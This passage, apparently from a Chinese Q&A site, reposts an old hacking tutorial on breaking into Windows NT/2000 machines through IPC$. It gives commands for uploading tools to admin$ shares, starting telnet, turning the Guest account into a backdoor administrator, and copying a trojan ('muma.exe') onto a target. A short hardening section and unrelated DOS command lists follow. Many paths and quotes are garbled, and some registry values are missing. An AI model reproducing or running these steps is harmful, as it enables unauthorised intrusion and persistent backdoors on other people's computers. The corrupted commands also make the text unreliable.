6. C:\&telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\© ntlm.exe $&&\\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32&ntlm
输入ntlm启动(这里的C:\WINNT\system32&指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现&DONE&的时候,就说明已经启动正常。然后使用&net start telnet&来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,****作就像在DOS上****作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组
10. C:\&net user guest /active:yes
将对方的Guest用户激活 11. C:\&net user guest 1234
将Guest的密码改为1234,或者你要设定的密码 12. C:\&net localgroup administrators guest /add
将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) ipc$常见问题: 1,怎样建立空连接,它有什么用?
答:使用命令 net use \IPipc$ && /user:&& 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。 2.为什么我连不上IPC$?
答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2.确认你的命令没有打错。正确的命令是: net use \目标IPipc$ &密码& /user:&用户名&
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用&&表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。 5,怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
6,怎样映射和访问默认共享?
答:使用命令 net use z: \目标IPc$ &密码& /user:&用户名& 将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用&&将路径全引住。
7,如何删除映射和ipc$连接?
答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。 8,连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。 9,怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止别人空连接
?? ?? 首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:。
?? ? 3,禁止自动打开默认共享
?? ?? 对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:。
对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤不常用DOS命令 diskcomp磁盘比较
append 设置非执行文件路径 expand 还原DOS文件
fasthelp快速显示帮助信息
fc 文件比较
interink启动服务器
setver 设置版本
intersvr启动客户机
subst 路径替换
qbasic Basic集成环境 vsafe 防病毒
unformat恢复已格式化的磁盘
ver 显示DOS版本号
smartdrv设置磁盘加速器 vol 显示磁盘卷标号
lh 将程序装入高端内存
ctty 改变控制设备
emm386 扩展内存管理
其他类似问题
格式化的相关知识
按默认排序
其他1条回答
你怎么格式化的啊 ?
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁
